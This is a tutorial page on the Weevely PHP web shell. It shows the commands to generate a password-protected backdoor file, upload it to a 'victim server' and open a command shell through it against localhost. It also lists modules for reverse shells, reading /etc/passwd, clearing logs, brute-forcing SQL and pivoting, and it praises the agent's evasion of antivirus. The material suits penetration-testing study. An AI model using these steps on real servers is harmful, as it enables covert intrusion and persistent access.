Generating A PHP Backdoor with Weevely
Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.
Installation
How to install:
sudo apt install weevelyUsage
[email protected]:~# weevely -h
usage: weevely [-h] {terminal,session,generate} ...
positional arguments:
{terminal,session,generate}
terminal Run terminal or command on the target
session Recover an existing session
generate Generate new agent
options:
-h, --help show this help message and exit
Generating a PHP Backdoor
For demonstration purposes, we will use Weevely to create a backdoor agent, which will be deployed on the target server. We just need to specify a password and a filename. The password will be used to access the backdoor later on.
[email protected]:weevely generate 123 backdoor.php
--> Generated backdoor with password '123' in 'backdoor.php' of 1332 byte size.
--> backdoor.php contains the following encoded file.Uploading the Backdoor to the victim server
Uploaded to the victim server. Then, instead of accessing the file through the browser, we connect to it using shell.
[email protected]: weevely http://localhost/include/backdoor.php 123--> [+] weevely 3.2.0
[+] Target: [email protected]:/var/www/html
[+] Session: /root/.weevely/sessions/localhost/ma_0.session
[+] Shell: System shell
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely>We now have backdoor access to the target server, and we can execute commands.
weevely> uname -a
--> Linux secureserver 4.2.0-16-generic #19-Ubuntu SMP Thu Oct 8 15:35:06 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
[email protected]:/var/www/html $Useful information
Weevely
Usage
weevely generate <password> <path>
weevely <URL> <password> [cmd]
Description
Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime.
Upload weevely PHP agent to a target web server to get remote shell access to it. It has more than 30 modules to assist administrative tasks, maintain access, provide situational awareness, elevate privileges, and spread into the target network.
Read the Install page to install weevely and its dependencies.
Read the Getting Started page to generate an agent and connect to it.
Browse the Wiki to read examples and use cases.
Features
- Shell access to the target
- SQL console pivoting on the target
- HTTP/HTTPS proxy to browse through the target
- Upload and download files
- Spawn reverse and direct TCP shells
- Audit remote target security
- Port scan pivoting on target
- Mount the remote filesystem
- Bruteforce SQL accounts pivoting on the target
Agent
The agent is a small, polymorphic PHP script hardly detected by AV and the communication protocol is obfuscated within HTTP requests.
Modules
| Module | Description |
|---|---|
| :audit_filesystem | Audit the file system for weak permissions. |
| :audit_suidsgid | Find files with SUID or SGID flags. |
| :audit_disablefunctionbypass | Bypass disable_function restrictions with mod_cgi and .htaccess. |
| :audit_etcpasswd | Read /etc/passwd with different techniques. |
| :audit_phpconf | Audit PHP configuration. |
| :shell_sh | Execute shell commands. |
| :shell_su | Execute commands with su. |
| :shell_php | Execute PHP commands. |
| :system_extensions | Collect PHP and webserver extension list. |
| :system_info | Collect system information. |
| :system_procs | List running processes. |
| :backdoor_reversetcp | Execute a reverse TCP shell. |
| :backdoor_tcp | Spawn a shell on a TCP port. |
| :bruteforce_sql | Bruteforce SQL database. |
| :file_gzip | Compress or expand gzip files. |
| :file_clearlog | Remove string from a file. |
| :file_check | Get attributes and permissions of a file. |
| :file_upload | Upload file to remote filesystem. |
| :file_webdownload | Download an URL. |
| :file_tar | Compress or expand tar archives. |
| :file_download | Download file from remote filesystem. |
| :file_bzip2 | Compress or expand bzip2 files. |
| :file_edit | Edit remote file on a local editor. |
| :file_grep | Print lines matching a pattern in multiple files. |
| :file_ls | List directory content. |
| :file_cp | Copy single file. |
| :file_rm | Remove remote file. |
| :file_upload2web | Upload file automatically to a web folder and get corresponding URL. |
| :file_zip | Compress or expand zip files. |
| :file_touch | Change file timestamp. |
| :file_find | Find files with given names and attributes. |
| :file_mount | Mount remote filesystem using HTTPfs. |
| :file_enum | Check existence and permissions of a list of paths. |
| :file_read | Read remote file from the remote filesystem. |
| :file_cd | Change current working directory. |
| :sql_console | Execute SQL query or run console. |
| :sql_dump | Multi dbms mysqldump replacement. |
| :net_mail | Send mail. |
| :net_phpproxy | Install PHP proxy on the target. |
| :net_curl | Perform a curl-like HTTP request. |
| :net_proxy | Run local proxy to pivot HTTP/HTTPS browsing through the target. |
| :net_scan | TCP Port scan. |
| :net_ifconfig | Get network interfaces addresses. |
Development
Weevely is easily extendible to implement internal audit, account enumerator, sensitive data scraper, network scanner, make the modules work as a HTTP or SQL client and do a lot of other cool stuff.
Reference
- https://github.com/epinna/weevely3
- https://www.kali.org/tools/weevely/
- https://www.acunetix.com/blog/articles/web-shells-action-introduction-web-shells-part-4/
